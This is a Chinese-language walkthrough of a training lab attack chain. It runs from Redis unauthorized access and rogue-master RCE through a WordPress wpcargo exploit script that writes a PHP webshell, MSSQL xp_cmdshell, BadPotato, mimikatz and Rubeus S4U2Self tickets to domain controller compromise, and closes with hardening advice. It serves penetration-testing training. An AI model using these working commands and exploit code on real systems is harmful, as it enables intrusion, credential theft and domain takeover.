从Redis未授权到域控提权Brute4Road靶场全链路攻击深度解析在渗透测试领域从外部突破到内网横向移动再到域控提权的完整攻击链是检验安全工程师技术深度的试金石。春秋云镜Brute4Road靶场恰好提供了这样一个典型的企业级渗透场景本文将系统性地拆解Redis未授权访问、WordPress插件漏洞利用、MSSQL提权以及Kerberos票据攻击S4U2Self等关键技术环节不仅展示操作步骤更深入剖析每个漏洞的底层原理和工具选择逻辑。1. Redis未授权访问的深度利用Redis作为高性能内存数据库默认配置下未授权访问漏洞屡见不鲜。当发现目标开放6379端口且存在未授权访问时传统SSH密钥写入方式常因目录权限不足失效此时主从复制模式RCE成为更可靠的攻击路径。1.1 主从复制攻击原理Redis主从复制机制允许从节点同步主节点的数据攻击者可伪造恶意主节点通过SLAVEOF命令使目标Redis成为从节点进而传输包含恶意模块的.so文件# 使用redis-rogue-server工具建立恶意主节点 python3 redis-rogue-server.py --rhost 靶机IP --lhost 攻击机IP关键参数解析--rhost目标Redis服务器IP--lhost攻击机IP需开放8888端口--lport可指定其他监听端口默认88881.2 交互式Shell获取与提权成功RCE后通常获得redis用户权限需进一步提权。通过SUID文件扫描发现可利用的二进制find / -user root -perm -4000 -print 2/dev/null若发现base64等命令具有SUID权限可通过以下方式提权# 利用base64读取受限文件 ./base64 $LFILE | base64 --decode2. 内网横向移动WordPress插件漏洞利用通过代理将流量导出内网后扫描发现WordPress站点存在wpcargo插件漏洞CVE-2022-24663该漏洞允许通过PNG文件处理逻辑写入Webshell。2.1 漏洞利用代码解析以下Python脚本实现了漏洞利用全过程import binascii import requests payload 2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50 # Webshell代码 def encode_character_code(c: int): return {:08b}.format(c).replace(0, x) text .join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:] requests.get( fhttp://目标IP/wp-content/plugins/wpcargo/includes/barcode.php?text{text}sizefactor.090909090909size1filepath/var/www/html/shell.php )攻击流程通过barcode.php的参数注入恶意像素数据生成包含?$_GET[1]($_POST[2]);?的webshell访问webshell执行系统命令2.2 数据库凭证提取通过webshell读取wp-config.php获取数据库凭证cat /var/www/html/wp-config.php | grep DB_使用获取的凭证登录MySQL数据库发现flag02及密码字典SELECT * FROM wp_users; SELECT * FROM sensitive_data WHERE name LIKE %password%;3. MSSQL服务提权实战利用获取的密码字典爆破MSSQL服务成功后需通过xp_cmdshell组件执行系统命令。3.1 xp_cmdshell激活流程-- 检查xp_cmdshell是否可用 SELECT count(*) FROM master.dbo.sysobjects WHERE xtypex AND namexp_cmdshell; -- 启用xp_cmdshell EXEC sp_configure show advanced options, 1; RECONFIGURE; EXEC sp_configure xp_cmdshell, 1; RECONFIGURE; -- 执行系统命令 EXEC master..xp_cmdshell whoami;3.2 BadPotato提权技术当MSSQL服务账户权限不足时可使用BadPotato进行本地提权.\Ladon48.exe BadPotato net localgroup administrators hacker /add提权后操作添加新用户至管理员组开启远程桌面服务通过RDP登录获取flag034. 域环境渗透与Kerberos票据攻击信息收集发现域环境后重点攻击域控制器DC。通过Kerberos协议的S4U2Self扩展可实现权限提升。4.1 服务账户密码提取使用mimikatz提取MSSQL服务账户的NTLM哈希mimikatz # sekurlsa::logonpasswords获取关键哈希值bd2cf5e6a8f89ed5b02d3d7fcf5e88c74.2 Rubeus工具链利用4.2.1 获取服务票据.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap4.2.2 S4U2Self攻击实施.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:BASE64_TICKET攻击效果代表域管理员申请LDAP服务票据将票据注入当前会话直接访问域控共享获取flag04type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt5. 防御措施与检测建议5.1 Redis安全加固措施具体操作访问控制配置bind 127.0.0.1及requirepass权限限制以非root用户运行Redis命令禁用修改redis.conf禁用高危命令rename-command FLUSHALL 5.2 WordPress安全建议定期更新插件和核心版本限制插件目录执行权限Directory /wp-content/plugins php_flag engine off /Directory实施WAF规则拦截异常barcode请求5.3 域环境防护策略限制服务账户的委派权限启用Kerberos审计日志监控异常票据请求实施LAPS本地管理员密码解决方案管理本地账户定期检查域控的DCSync权限分配